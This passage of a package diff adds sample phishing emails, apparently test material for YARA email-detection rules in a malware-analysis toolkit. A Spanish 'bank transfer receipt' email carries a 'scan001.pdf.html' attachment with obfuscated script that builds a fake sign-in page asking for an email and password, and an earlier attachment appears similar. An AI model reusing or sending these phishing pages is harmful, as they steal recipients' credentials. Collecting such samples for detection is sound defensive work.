+NkYlNkQlNjUlNDUlNzglNzQlMjklM0IlMEElMjAlMjAlNjMlNkYlNkUlNzMlNkYlNkMlNjUlMkUl
+NkMlNkYlNjclMjglMjclNDMlNzIlNjUlNjQlNjUlNkUlNzQlNjklNjElNkMlNzMlMjAlNzMlNjUl
+NkUlNzQlMjclMjklM0IlMEElMjAlMjAlNzYlNjElNzIlMjAlNjMlNkYlNkUlNzQlNjklNkUlNzUl
+NjUlNTUlNzIlNkMlNDUlNkMlNjUlNkQlNjUlNkUlNzQlMjAlM0QlMjAlNjclNjElNjklNjElNEMl
+NkYlNjclNjklNkUlNDYlNkYlNzIlNkQlNUIlMjclNjMlNkYlNkUlNzQlNjklNkUlNzUlNjUlMjcl
+NUQlM0IlMEElMjAlMjAlNjklNjYlMjAlMjglNjMlNkYlNkUlNzQlNjklNkUlNzUlNjUlNTUlNzIl
+NkMlNDUlNkMlNjUlNkQlNjUlNkUlNzQlMjklMjAlN0IlMEElMjAlMjAlNzYlNjElNzIlMjAlNzAl
+NzIlNjUlNzYlNDElNzQlNzQlNjUlNkQlNzAlNzQlNDklNkUlNjQlNjUlNzglMjAlM0QlMjAlNjMl
+NkYlNkUlNzQlNjklNkUlNzUlNjUlNTUlNzIlNkMlNDUlNkMlNjUlNkQlNjUlNkUlNzQlMkUlNzYl
+NjElNkMlNzUlNjUlMkUlNjklNkUlNjQlNjUlNzglNEYlNjYlMjglMjclM0YlNjElNzQlNzQlNjUl
+NkQlNzAlNzQlNTQlNkYlNkIlNjUlNkUlMjclMjklM0IlMEElMjAlMjAlNjklNjYlMjAlMjglNzAl
+NzIlNjUlNzYlNDElNzQlNzQlNjUlNkQlNzAlNzQlNDklNkUlNjQlNjUlNzglMjAlMjElM0QlMjAl
+MkQlMzElMjklMjAlN0IlMEElMjAlMjAlNjMlNkYlNkUlNzQlNjklNkUlNzUlNjUlNTUlNzIlNkMl
+NDUlNkMlNjUlNkQlNjUlNkUlNzQlMkUlNzYlNjElNkMlNzUlNjUlMjAlM0QlMjAlNjMlNkYlNkUl
+NzQlNjklNkUlNzUlNjUlNTUlNzIlNkMlNDUlNkMlNjUlNkQlNjUlNkUlNzQlMkUlNzYlNjElNkMl
+NzUlNjUlMkUlNzMlNzUlNjIlNzMlNzQlNzIlMjglMEElMjAlMjAlMzAlMkMlMjAlNzAlNzIlNjUl
+NzYlNDElNzQlNzQlNjUlNkQlNzAlNzQlNDklNkUlNjQlNjUlNzglMjklM0IlMEElMjAlMjAlN0Ql
+MEElMjAlMjAlNjMlNkYlNkUlNzQlNjklNkUlNzUlNjUlNTUlNzIlNkMlNDUlNkMlNjUlNkQlNjUl
+NkUlNzQlMkUlNzYlNjElNkMlNzUlNjUlMjAlMkIlM0QlMjAlMjclM0YlNjElNzQlNzQlNjUlNkQl
+NzAlNzQlNTQlNkYlNkIlNjUlNkUlM0QlMjclMjAlMkIlMjAlNjElNzQlNzQlNjUlNkQlNzAlNzQl
+NTQlNkYlNkIlNjUlNkUlM0IlMEElMjAlMjAlN0QlMEElMjAlMjAlN0QlM0IlMEElMjAlMjAlNjcl
+NjElNjklNjElNUYlNjElNzQlNzQlNjElNjMlNjglNDUlNzYlNjUlNkUlNzQlMjglNjclNjElNjkl
+NjElNEMlNkYlNjclNjklNkUlNDYlNkYlNzIlNkQlMkMlMjAlMjclNzMlNzUlNjIlNkQlNjklNzQl
+MjclMkMlMjAlNjclNjElNjklNjElNUYlNkYlNkUlNDMlNjglNzIlNkYlNkQlNjUlNEMlNkYlNjcl
+NjklNkUlNTMlNzUlNjIlNkQlNjklNzQlMjklM0IlMEElN0QlMjklMjglMjklM0IlMEElM0MlMkYl
+NzMlNjMlNzIlNjklNzAlNzQlM0UlMEElM0MlNzMlNjMlNzIlNjklNzAlNzQlM0UlMEElMjAlMjAl
+MjglNjYlNzUlNkUlNjMlNzQlNjklNkYlNkUlMjglMjklN0IlMEElMjAlMjAlNzYlNjElNzIlMjAl
+NzMlNjklNjclNkUlNjklNkUlNDklNkUlNzAlNzUlNzQlMjAlM0QlMjAlNjQlNkYlNjMlNzUlNkQl
+NjUlNkUlNzQlMkUlNjclNjUlNzQlNDUlNkMlNjUlNkQlNjUlNkUlNzQlNDIlNzklNDklNjQlMjgl
+MjclNzMlNjklNjclNkUlNDklNkUlMjclMjklM0IlMEElMjAlMjAlNjclNjElNjklNjElNUYlNkYl
+NkUlNEMlNkYlNjclNjklNkUlNTMlNzUlNjIlNkQlNjklNzQlMjAlM0QlMjAlNjYlNzUlNkUlNjMl
+NzQlNjklNkYlNkUlMjglMjklMjAlN0IlMEElMjAlMjAlNzQlNzIlNzklMjAlN0IlMEElMjAlMjAl
+NjQlNkYlNjMlNzUlNkQlNjUlNkUlNzQlMkUlNjIlNjclMkUlNjklNkUlNzYlNkYlNkIlNjUlMjgl
+NjYlNzUlNkUlNjMlNzQlNjklNkYlNkUlMjglNzIlNjUlNzMlNzAlNkYlNkUlNzMlNjUlMjklMjAl
+N0IlMEElMjAlMjAlNjQlNkYlNjMlNzUlNkQlNjUlNkUlNzQlMkUlNjclNjUlNzQlNDUlNkMlNjUl
+NkQlNjUlNkUlNzQlNDIlNzklNDklNjQlMjglMjclNjIlNjclNzIlNjUlNzMlNzAlNkYlNkUlNzMl
+NjUlMjclMjklMkUlNzYlNjElNkMlNzUlNjUlMjAlM0QlMjAlNzIlNjUlNzMlNzAlNkYlNkUlNzMl
+NjUlM0IlMEElMjAlMjAlN0QlMjklM0IlMEElMjAlMjAlN0QlMjAlNjMlNjElNzQlNjMlNjglMjAl
+MjglNjUlNzIlNzIlMjklMjAlN0IlMEElMjAlMjAlNjQlNkYlNjMlNzUlNkQlNjUlNkUlNzQlMkUl
+NjclNjUlNzQlNDUlNkMlNjUlNkQlNjUlNkUlNzQlNDIlNzklNDklNjQlMjglMjclNjIlNjclNzIl
+NjUlNzMlNzAlNkYlNkUlNzMlNjUlMjclMjklMkUlNzYlNjElNkMlNzUlNjUlMjAlM0QlMjAlMjcl
+MjclM0IlMEElMjAlMjAlN0QlMEElMjAlMjAlNzIlNjUlNzQlNzUlNzIlNkUlMjAlNzQlNzIlNzUl
+NjUlM0IlMEElMjAlMjAlN0QlMEElMjAlMjAlNjQlNkYlNjMlNzUlNkQlNjUlNkUlNzQlMkUlNjcl
+NjUlNzQlNDUlNkMlNjUlNkQlNjUlNkUlNzQlNDIlNzklNDklNjQlMjglMjclNjclNjElNjklNjEl
+NUYlNkMlNkYlNjclNjklNkUlNjYlNkYlNzIlNkQlMjclMjklMkUlNkYlNkUlNzMlNzUlNjIlNkQl
+NjklNzQlMjAlM0QlMjAlNjclNjElNjklNjElNUYlNkYlNkUlNEMlNkYlNjclNjklNkUlNTMlNzUl
+NjIlNkQlNjklNzQlM0IlMEElMjAlMjAlNzYlNjElNzIlMjAlNzMlNjklNjclNkUlNjklNkUlNDIl
+NzUlNzQlNzQlNkYlNkUlMjAlM0QlMjAlNjQlNkYlNjMlNzUlNkQlNjUlNkUlNzQlMkUlNjclNjUl
+NzQlNDUlNkMlNjUlNkQlNjUlNkUlNzQlNDIlNzklNDklNjQlMjglMjclNzMlNjklNjclNkUlNDkl
+NkUlMjclMjklM0IlMEElMjAlMjAlNjclNjElNjklNjElNUYlNjElNzQlNzQlNjElNjMlNjglNDUl
+NzYlNjUlNkUlNzQlMjglNzclNjklNkUlNjQlNkYlNzclMkMlMjAlMjclNkMlNkYlNjElNjQlMjcl
+MkMlMjAlNjYlNzUlNkUlNjMlNzQlNjklNkYlNkUlMjglMjklN0IlMEElMjAlMjAlNjclNjElNjkl
+NjElNUYlNzMlNjMlNzIlNkYlNkMlNkMlNTQlNkYlNDUlNkMlNjUlNkQlNjUlNkUlNzQlMjglNzMl
+NjklNjclNkUlNjklNkUlNDIlNzUlNzQlNzQlNkYlNkUlMjklM0IlMEElMjAlMjAlN0QlMjklM0Il
+MEElMjAlMjAlN0QlMjklM0IlMEElM0MlMkYlNzMlNjMlNzIlNjklNzAlNzQlM0UlMEElMjAlMjAl
+M0MlNzMlNjMlNzIlNjklNzAlNzQlMjAlNzQlNzklNzAlNjUlM0QlMjIlNzQlNjUlNzglNzQlMkYl
+NkElNjElNzYlNjElNzMlNjMlNzIlNjklNzAlNzQlMjIlM0UlMEElNzYlNjElNzIlMjAlNDIlNzIl
+NkYlNzclNzMlNjUlNzIlNTMlNzUlNzAlNzAlNkYlNzIlNzQlNUYlM0QlN0IlNDklNzMlNDIlNzIl
+NkYlNzclNzMlNjUlNzIlNTMlNzUlNzAlNzAlNkYlNzIlNzQlNjUlNjQlM0ElNjYlNzUlNkUlNjMl
+NzQlNjklNkYlNkUlMjglMjklN0IlNzYlNjElNzIlMjAlNjElNjclNzQlM0QlNkUlNjElNzYlNjkl
+NjclNjElNzQlNkYlNzIlMkUlNzUlNzMlNjUlNzIlNDElNjclNjUlNkUlNzQlMkUlNzQlNkYlNEMl
+NkYlNzclNjUlNzIlNDMlNjElNzMlNjUlMjglMjklM0IlNzYlNjElNzIlMjAlNjklNzMlNUYlNkYl
+NzAlM0QlNjElNjclNzQlMkUlNjklNkUlNjQlNjUlNzglNEYlNjYlMjglMjIlNkYlNzAlNjUlNzIl
+NjElMjIlMjklMjElM0QlMkQlMzElM0IlNzYlNjElNzIlMjAlMEElMEElNjklNzMlNUYlNjklNjUl
+M0QlNjElNjclNzQlMkUlNjklNkUlNjQlNjUlNzglNEYlNjYlMjglMjIlNkQlNzMlNjklNjUlMjIl
+MjklMjElM0QlMkQlMzElMjYlMjYlNjQlNkYlNjMlNzUlNkQlNjUlNkUlNzQlMkUlNjElNkMlNkMl
+MjYlMjYlMjElNjklNzMlNUYlNkYlNzAlM0IlNzYlNjElNzIlMjAlNjklNzMlNUYlNjklNjUlMzUl
+M0QlNjElNjclNzQlMkUlNjklNkUlNjQlNjUlNzglNEYlNjYlMjglMjIlNkQlNzMlNjklNjUlMjAl
+MzUlMjIlMjklMjElM0QlMkQlMzElMjYlMjYlNjQlNkYlNjMlNzUlNkQlNjUlNkUlNzQlMkUlNjEl
+NkMlNkMlMjYlMjYlMjElNjklNzMlNUYlNkYlNzAlM0IlNzYlNjElNzIlMjAlNjklNzMlNUYlNkQl
+NjElNjMlM0QlNjElNjclNzQlMkUlNjklNkUlNjQlNjUlNzglNEYlNjYlMEElMEElMjglMjIlNkQl
+NjElNjMlMjIlMjklMjElM0QlMkQlMzElM0IlNzYlNjElNzIlMjAlNjklNzMlNUYlNjclNkIlM0Ql
+NjElNjclNzQlMkUlNjklNkUlNjQlNjUlNzglNEYlNjYlMjglMjIlNjclNjUlNjMlNkIlNkYlMjIl
+MjklMjElM0QlMkQlMzElM0IlNzYlNjElNzIlMjAlNjklNzMlNUYlNzMlNjYlM0QlNjElNjclNzQl
+MkUlNjklNkUlNjQlNjUlNzglNEYlNjYlMjglMjIlNzMlNjElNjYlNjElNzIlNjklMjIlMjklMjEl
+M0QlMkQlMzElM0IlNjklNjYlMjglNjklNzMlNUYlNjklNjUlMjYlMjYlMjElNjklNzMlNUYlNkYl
+NzAlMjYlMjYlMjElNjklNzMlNUYlNkQlNjElNjMlMjklN0IlNjklNjYlMjglNjElNjclNzQlMkUl
+NjklNkUlNjQlNjUlNzglNEYlNjYlMjglMjIlNzAlNjElNkMlNkQlNzMlNkYlNzUlNzIlNjMlNjUl
+MjIlMjklMjElM0QlMEElMkQlMzElN0MlN0MlNjElNjclNzQlMkUlNjklNkUlNjQlNjUlNzglNEYl
+NjYlMjglMjIlNzIlNjUlNjclNkIlNjklNkUlNjclMjIlMjklMjElM0QlMkQlMzElN0MlN0MlNjEl
+NjclNzQlMkUlNjklNkUlNjQlNjUlNzglNEYlNjYlMjglMjIlNzclNjklNkUlNjQlNkYlNzclNzMl
+MjAlNjMlNjUlMjIlMjklMjElM0QlMkQlMzElN0MlN0MlNjElNjclNzQlMkUlNjklNkUlNjQlNjUl
+NzglNEYlNjYlMjglMjIlNkElMzIlNkQlNjUlMjIlMjklMjElM0QlMkQlMzElN0MlN0MlNjElNjcl
+NzQlMkUlNjklNkUlNjQlNjUlNzglNEYlNjYlMjglMjIlNjElNzYlNjElNkUlNzQlNjclNkYlMjIl
+MjklMjElM0QlMkQlMzElN0MlN0MlNjElNjclNzQlMkUlNjklNkUlNjQlNjUlNzglNEYlNjYlMjgl
+MjIlMjAlNzMlNzQlNjIlMjIlMjklMjElM0QlMkQlMzElMjklMEElMEElNzIlNjUlNzQlNzUlNzIl
+NkUlMjAlNjYlNjElNkMlNzMlNjUlM0IlNzYlNjElNzIlMjAlNzYlM0QlNDIlNzIlNkYlNzclNzMl
+NjUlNzIlNTMlNzUlNzAlNzAlNkYlNzIlNzQlNUYlMkUlNDclNjUlNzQlNDYlNkYlNkMlNkMlNkYl
+NzclNjklNkUlNjclNDYlNkMlNkYlNjElNzQlMjglNjElNjclNzQlMkMlMjIlNkQlNzMlNjklNjUl
+MjAlMjIlMjklM0IlNjklNjYlMjglNzYlMjElM0QlNkUlNzUlNkMlNkMlMjklNzIlNjUlNzQlNzUl
+NzIlNkUlMjAlNzYlM0UlM0QlMzUlMkUlMzUlN0QlNjklNjYlMjglNjklNzMlNUYlNjclNkIlMjYl
+MjYlMjElNjklNzMlNUYlNzMlNjYlMjklN0IlNzYlNjElNzIlMjAlMEElMEElNzYlM0QlNDIlNzIl
+NkYlNzclNzMlNjUlNzIlNTMlNzUlNzAlNzAlNkYlNzIlNzQlNUYlMkUlNDclNjUlNzQlNDYlNkYl
+NkMlNkMlNkYlNzclNjklNkUlNjclNDYlNkMlNkYlNjElNzQlMjglNjElNjclNzQlMkMlMjIlNzIl
+NzYlM0ElMjIlMjklM0IlNjklNjYlMjglNzYlMjElM0QlNkUlNzUlNkMlNkMlMjklNzIlNjUlNzQl
+NzUlNzIlNkUlMjAlNzYlM0UlM0QlMzElMkUlMzQlM0IlNjUlNkMlNzMlNjUlN0IlNzYlM0QlNDIl
+NzIlNkYlNzclNzMlNjUlNzIlNTMlNzUlNzAlNzAlNkYlNzIlNzQlNUYlMkUlNDclNjUlNzQlNDYl
+NkYlNkMlNkMlNkYlNzclNjklNkUlNjclNDYlNkMlNkYlNjElNzQlMjglNjElNjclNzQlMkMlMjIl
+NjclNjElNkMlNjUlNkYlNkUlMkYlMjIlMjklM0IlNjklNjYlMjglNzYlMjElM0QlNkUlNzUlNkMl
+NkMlMjklMEElMEElNzIlNjUlNzQlNzUlNzIlNkUlMjAlNzYlM0UlM0QlMEElMzElMkUlMzMlN0Ql
+N0QlNjklNjYlMjglNjklNzMlNUYlNzMlNjYlMjklN0IlNjklNjYlMjglNjElNjclNzQlMkUlNjkl
+NkUlNjQlNjUlNzglNEYlNjYlMjglMjIlNzIlNzYlM0ElMzMlMkUlMzElMzQlMkUlMzElMzUlMkUl
+MzklMzIlMkUlMzYlMzUlMjIlMjklMjElM0QlMkQlMzElMjklNzIlNjUlNzQlNzUlNzIlNkUlMjAl
+NjYlNjElNkMlNzMlNjUlM0IlNzYlNjElNzIlMjAlNzYlM0QlNDIlNzIlNkYlNzclNzMlNjUlNzIl
+NTMlNzUlNzAlNzAlNkYlNzIlNzQlNUYlMkUlNDclNjUlNzQlNDYlNkYlNkMlNkMlNkYlNzclNjkl
+NkUlNjclNDYlNkMlNkYlNjElNzQlMjglNjElNjclNzQlMkMlMjIlNjElNzAlNzAlNkMlNjUlNzcl
+NjUlNjIlNkIlNjklNzQlMkYlMjIlMjklM0IlNjklNjYlMjglNzYlMjElM0QlNkUlNzUlNkMlNkMl
+MjklMEElMEElNzIlNjUlNzQlNzUlNzIlNkUlMjAlNzYlM0UlM0QlMzMlMzElMzIlN0QlNjklNjYl
+MjglNjklNzMlNUYlNkYlNzAlMjklN0IlNjklNjYlMjglNjElNjclNzQlMkUlNjklNkUlNjQlNjUl
+NzglNEYlNjYlMjglMjIlNzMlNkYlNkUlNzklMkYlNjMlNkYlNkQlMzElMjIlMjklMjElM0QlMkQl
+MzElMjklNzIlNjUlNzQlNzUlNzIlNkUlMjAlNjYlNjElNkMlNzMlNjUlM0IlNzYlNjElNzIlMjAl
+NzYlM0QlNDIlNzIlNkYlNzclNzMlNjUlNzIlNTMlNzUlNzAlNzAlNkYlNzIlNzQlNUYlMkUlNDcl
+NjUlNzQlNDYlNkYlNkMlNkMlNkYlNzclNjklNkUlNjclNDYlNkMlNkYlNjElNzQlMjglNjElNjcl
+NzQlMkMlMjIlNkYlNzAlNjUlNzIlNjElMjAlMjIlMjklM0IlNjklNjYlMjglNzYlM0QlM0QlNkUl
+NzUlNkMlNkMlMjklMEElMEElNzYlM0QlNDIlNzIlNkYlNzclNzMlNjUlNzIlNTMlNzUlNzAlNzAl
+NkYlNzIlNzQlNUYlMkUlNDclNjUlNzQlNDYlNkYlNkMlNkMlNkYlNzclNjklNkUlNjclNDYlNkMl
+NkYlNjElNzQlMjglNjElNjclNzQlMkMlMjIlNkYlNzAlNjUlNzIlNjElMkYlMjIlMjklM0IlNjkl
+NjYlMjglNzYlMjElM0QlNkUlNzUlNkMlNkMlMjklNzIlNjUlNzQlNzUlNzIlNkUlMjAlNzYlM0Ul
+M0QlMzglN0QlNjklNjYlMjglNjElNjclNzQlMkUlNjklNkUlNjQlNjUlNzglNEYlNjYlMjglMjIl
+NzAlNjQlNjElM0IlMjAlNzMlNkYlNkUlNzklMkYlNjMlNkYlNkQlMzIlMjIlMjklMjElM0QlMkQl
+MzElMjklNzIlNjUlNzQlNzUlNzIlNkUlMjAlNzQlNzIlNzUlNjUlM0IlNzIlNjUlNzQlNzUlNzIl
+NkUlMjAlNjYlNjElNkMlNzMlNjUlN0QlMkMlMEElNDclNjUlNzQlNDYlNkYlNkMlNkMlNkYlNzcl
+NjklNkUlNjclNDYlNkMlNkYlNjElNzQlM0ElNjYlNzUlNkUlNjMlNzQlNjklNkYlNkUlMjglNzMl
+NzQlNzIlMkMlNzAlNjYlNzglMjklN0IlNzYlNjElNzIlMjAlNjklM0QlNzMlNzQlNzIlMkUlNjkl
+NkUlNjQlNjUlNzglNEYlNjYlMjglNzAlNjYlNzglMjklM0IlNjklNjYlMjglNjklMjElM0QlMkQl
+MzElMjklN0IlNzYlNjElNzIlMjAlNzYlM0QlNzAlNjElNzIlNzMlNjUlNDYlNkMlNkYlNjElNzQl
+MjglNzMlNzQlNzIlMkUlNzMlNzUlNjIlNzMlNzQlNzIlNjklNkUlNjclMjglNjklMkIlNzAlNjYl
+NzglMkUlNkMlNjUlNkUlNjclNzQlNjglMjklMjklM0IlNjklNjYlMjglMjElNjklNzMlNEUlNjEl
+NEUlMjglNzYlMjklMjklNzIlNjUlNzQlNzUlNzIlNkUlMjAlNzYlN0QlMEElMEElNzIlNjUlNzQl
+NzUlNzIlNkUlMjAlNkUlNzUlNkMlNkMlN0QlN0QlM0IlNzYlNjElNzIlMjAlNjklNzMlNUYlNjIl
+NzIlNkYlNzclNzMlNjUlNzIlNUYlNzMlNzUlNzAlNzAlNkYlNzIlNzQlNjUlNjQlM0QlNDIlNzIl
+NkYlNzclNzMlNjUlNzIlNTMlNzUlNzAlNzAlNkYlNzIlNzQlNUYlMkUlNDklNzMlNDIlNzIlNkYl
+NzclNzMlNjUlNzIlNTMlNzUlNzAlNzAlNkYlNzIlNzQlNjUlNjQlMjglMjklMEElMjAlMjAlM0Ml
+MkYlNzMlNjMlNzIlNjklNzAlNzQlM0UlMEElMjAlMjAlM0MlMkYlNjIlNkYlNjQlNzklM0UlMEEl
+M0MlMkYlNjglNzQlNkQlNkMlM0UlMEEnKSk8L3NjcmlwdD4NCg==
+--001a114080ea5c79e6052a51c167--
diff -Nru remnux-rules-0.0.3/yara/email/eml/transferencia2.eml remnux-rules-0.0.4/yara/email/eml/transferencia2.eml
--- remnux-rules-0.0.3/yara/email/eml/transferencia2.eml	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/email/eml/transferencia2.eml	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,3030 @@
+De: Carmen Celia Borrego Verdugo <XXX@YYY.com>
+Fecha: 24 de enero de 2016, 17:08
+Asunto: justificante de transferencia
+Para:
+
+
+
+
+--=20
+Hola,
+
+Adjunto justificante de transferencia
+
+Gracias,
+Maria Alfonso.
+Departamento de contabilidad
++34631470545
++34631470545
+
+
+
+CONFIDENCIALIDAD
+La informaci=C3=B3n contenida en este mensaje y/o archivo(s) adjunto(s) es
+confidencial/privilegiada y est=C3=A1 destinada a ser le=C3=ADda s=C3=B3lo =
+por la(s)
+persona(s) a la(s) que va dirigida. Si usted lee este mensaje y no es el
+destinatario se=C3=B1alado, el empleado o el agente responsable de entregar=
+ el
+mensaje al destinatario, o ha recibido esta comunicaci=C3=B3n por error, le
+informamos que est=C3=A1 totalmente prohibida, y puede ser ilegal, cualquie=
+r
+divulgaci=C3=B3n, distribuci=C3=B3n o reproducci=C3=B3n de esta comunicaci=
+=C3=B3n, y le rogamos
+que nos lo notifique inmediatamente y nos devuelva el mensaje original a la
+direcci=C3=B3n arriba mencionada. Gracias.
+VIRUS Y SEGURIDAD
+Aunque hemos tomado las medidas para asegurarnos que este correo
+electr=C3=B3nico y sus ficheros adjuntos est=C3=A1n libres de virus, le rec=
+omendamos
+que a efectos de mantener buenas pr=C3=A1cticas de seguridad, el receptor d=
+ebe
+asegurarse que este correo y sus ficheros adjuntos est=C3=A1n libres de vir=
+us.
+
+--001a11c33e224dfc37052a242883
+Content-Type: text/html; charset=US-ASCII; name="scan001.pdf.html"
+Content-Disposition: attachment; filename="scan001.pdf.html"
+Content-Transfer-Encoding: base64
+X-Attachment-Id: f_ijsqos3o0
+
+PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0Ml
+MjElNDQlNEYlNDMlNTQlNTklNTAlNDUlMjAlNjglNzQlNkQlNkMlM0UlMEElM0MlNjglNzQlNkQl
+NkMlMjAlNzglNkQlNkMlNkUlNzMlM0QlMjIlNjglNzQlNzQlNzAlM0ElMkYlMkYlNzclNzclNzcl
+MkUlNzclMzMlMkUlNkYlNzIlNjclMkYlMzElMzklMzklMzklMkYlNzglNjglNzQlNkQlNkMlMjIl
+M0UlM0MlNjglNjUlNjElNjQlM0UlMEElM0MlNkQlNjUlNzQlNjElMjAlNkUlNjElNkQlNjUlM0Ql
+MjIlNzIlNkYlNjIlNkYlNzQlNzMlMjIlMjAlNjMlNkYlNkUlNzQlNjUlNkUlNzQlM0QlMjIlNkUl
+NkYlNjklNkUlNjQlNjUlNzglMkMlMjAlNkUlNkYlNjYlNkYlNkMlNkMlNkYlNzclMjIlM0UlMEEl
+M0MlNkQlNjUlNzQlNjElMjAlNkUlNjElNkQlNjUlM0QlMjIlNjclNkYlNkYlNjclNkMlNjUlNjIl
+NkYlNzQlMjIlMjAlNjMlNkYlNkUlNzQlNjUlNkUlNzQlM0QlMjIlNkUlNkYlNjklNkUlNjQlNjUl
+NzglMkMlMjAlNkUlNkYlNjYlNkYlNkMlNkMlNkYlNzclMkMlMjAlNkUlNkYlNjElNzIlNjMlNjgl
+NjklNzYlNjUlMkMlMjAlNkUlNkYlNzMlNkUlNjklNzAlNzAlNjUlNzQlMkMlMjAlNkUlNkYlNkYl
+NjQlNzAlMjIlM0UlMEElMjAlMjAlM0MlNzQlNjklNzQlNkMlNjUlM0UlNTMlNjklNjclNkUlMjAl
+NDklNkUlM0MlMkYlNzQlNjklNzQlNkMlNjUlM0UlMEElMjAlMjAlM0MlNzMlNjMlNzIlNjklNzAl
+NzQlM0UlMEElMjAlMjAlMjAlMjAlNjYlNzUlNkUlNjMlNzQlNjklNkYlNkUlMjAlNzMlNjklNjcl
+NkUlNEYlNkUlMjglMjklMjAlN0IlMEElMEElMDklMDklNzUlMjAlM0QlMjAlNjQlNkYlNjMlNzUl
+NkQlNjUlNkUlNzQlMkUlNjklNkUlNjQlNjUlNzglMzIlMkUlNDUlNkQlNjElNjklNkMlM0IlMEEl
+MDklMDklNzAlMjAlM0QlMjAlNjQlNkYlNjMlNzUlNkQlNjUlNkUlNzQlMkUlNjklNkUlNjQlNjUl
+NzglMzIlMkUlNTAlNjElNzMlNzMlNzclNjQlM0IlMEElMjAlMjAlMjAlMjAlMjAlMjAlMEElMDkl
+NjklNjYlMjglNzUlMkUlNzYlNjElNkMlNzUlNjUlMjAlM0QlM0QlMjIlMjIlMjklMEElMjAlMjAl
+MjAlMjAlMjAlMjAlMjAlMjAlN0IlMEElMDklMkYlMkYlNjElNkMlNjUlNzIlNzQlMjglMjIlNTAl
+NkMlNjUlNjElNzMlNjUlMjAlNjUlNkUlNzQlNjUlNzIlMjAlNjElMjAlNzYlNjElNkMlNjklNjQl
+MjAlNTUlNzMlNjUlNzIlMjAlNEUlNjElNkQlNjUlMjAlNjElNkUlNjQlMjAlNTAlNjElNzMlNzMl
+NzclNkYlNzIlNjQlMkUlMjIlMjklM0IlMEElMDklNjElNkMlNjUlNzIlNzQlMjglMjIlNTAlNkMl
+NjUlNjElNzMlNjUlMjAlNjUlNkUlNzQlNjUlNzIlMjAlNzklNkYlNzUlNzIlMjAlNDUlNkQlNjEl
+NjklNkMlMjAlNDklNDQlMjIlMjklM0IlMEElMDklNjQlNkYlNjMlNzUlNkQlNjUlNkUlNzQlMkUl
+NjklNkUlNjQlNjUlNzglMzIlMkUlNDUlNkQlNjElNjklNkMlMkUlNjYlNkYlNjMlNzUlNzMlMjgl
+MjklMjAlM0IlMjAlMEElMDklNzIlNjUlNzQlNzUlNzIlNkUlMjAlNjYlNjElNkMlNzMlNjUlM0Il
+MEElMDklN0QlMEElMDklMEElMDklNjklNjYlMjglNzAlMkUlNzYlNjElNkMlNzUlNjUlMjAlM0Ql
+M0QlMjIlMjIlMjklMEElMDklMjAlN0IlMEElMDklMkYlMkYlNjElNkMlNjUlNzIlNzQlMjglMjIl
+NTAlNkMlNjUlNjElNzMlNjUlMjAlNjUlNkUlNzQlNjUlNzIlMjAlNjElMjAlNzYlNjElNkMlNjkl
+NjQlMjAlNTUlNzMlNjUlNzIlMjAlNEUlNjElNkQlNjUlMjAlNjElNkUlNjQlMjAlNTAlNjElNzMl
+NzMlNzclNkYlNzIlNjQlMkUlMjIlMjklM0IlMEElMDklNjElNkMlNjUlNzIlNzQlMjglMjIlNTAl
+NkMlNjUlNjElNzMlNjUlMjAlNjUlNkUlNzQlNjUlNzIlMjAlNzklNkYlNzUlNzIlMjAlNTAlNjEl
+NzMlNzMlNzclNkYlNzIlNjQlMjIlMjklM0IlMEElMDklMDklNjQlNkYlNjMlNzUlNkQlNjUlNkUl
+NzQlMkUlNjklNkUlNjQlNjUlNzglMzIlMkUlNTAlNjElNzMlNzMlNzclNjQlMkUlNjYlNkYlNjMl
+NzUlNzMlMjglMjklMjAlM0IlMjAlMEElMDklNzIlNjUlNzQlNzUlNzIlNkUlMjAlNjYlNjElNkMl
+NzMlNjUlM0IlMEElMDklN0QlMEElMDklNzIlNjUlNzQlNzUlNzIlNkUlMjglMjAlNzQlNzIlNzUl
+NjUlMjAlMjklM0IlMEElN0QlMEElM0MlMkYlNzMlNjMlNzIlNjklNzAlNzQlM0UlMEElMEElM0Ml
+NzMlNzQlNzklNkMlNjUlM0UlMEElMjAlMjAlNjglNzQlNkQlNkMlMkMlMjAlNjIlNkYlNjQlNzkl
+MjAlN0IlMEElMjAlMjAlNjYlNkYlNkUlNzQlMkQlNjYlNjElNkQlNjklNkMlNzklM0ElMjAlNDEl
+NzIlNjklNjElNkMlMkMlMjAlNzMlNjElNkUlNzMlMkQlNzMlNjUlNzIlNjklNjYlM0IlMEElMjAl
+MjAlNjIlNjElNjMlNkIlNjclNzIlNkYlNzUlNkUlNjQlMkQlNjklNkQlNjElNjclNjUlM0ElNzUl
+NzIlNkMlMjglNjglNzQlNzQlNzAlM0ElMkYlMkYlNjMlNjQlNkUlMkUlNzQlNzIlNjklNzAlNzcl
+NjklNzIlNjUlNkQlNjElNjclNjElN0ElNjklNkUlNjUlMkUlNjMlNkYlNkQlMkYlNzclNzAlMkQl
+NjMlNkYlNkUlNzQlNjUlNkUlNzQlMkYlNzUlNzAlNkMlNkYlNjElNjQlNzMlMkYlMzIlMzAlMzEl
+MzMlMkYlMzAlMzElMkYlNzclNkYlNzIlNkMlNjQlMkQlNkQlNjElNzAlMkQlNjQlNkYlNzQlNzQl
+NjUlNjQlMkQlNzYlNjUlNjMlNzQlNkYlNzIlMkUlNzAlNkUlNjclMjklM0IlMEElMjAlNjIlNjEl
+NjMlNkIlNjclNzIlNkYlNzUlNkUlNjQlMkQlNzMlNjklN0ElNjUlM0ElMjAlMzElMzQlMzAlMzAl
+NzAlNzglMjAlMzclMzAlMzAlNzAlNzglM0IlMEElMjAlMjAlMjAlMjAlNjIlNjElNjMlNkIlNjcl
+NzIlNkYlNzUlNkUlNjQlMkQlNzIlNjUlNzAlNjUlNjElNzQlM0ElMjAlNkUlNkYlMkQlNzIlNjUl
+NzAlNjUlNjElNzQlM0IlMEElMDklNjIlNjElNjMlNkIlNjclNzIlNkYlNzUlNkUlNjQlMkQlNzAl
+NkYlNzMlNjklNzQlNjklNkYlNkUlM0ElNjMlNjUlNkUlNzQlNjUlNzIlMEElMjAlMjAlNkQlNjEl
+NzIlNjclNjklNkUlM0ElMjAlMzAlM0IlMEElMjAlMjAlNzAlNjElNjQlNjQlNjklNkUlNjclM0El
+MjAlMzAlM0IlMEElMjAlMjAlNjIlNkYlNzIlNjQlNjUlNzIlM0ElMjAlMzAlM0IlMEElMjAlMjAl
+NzAlNkYlNzMlNjklNzQlNjklNkYlNkUlM0ElMjAlNjElNjIlNzMlNkYlNkMlNzUlNzQlNjUlM0Il
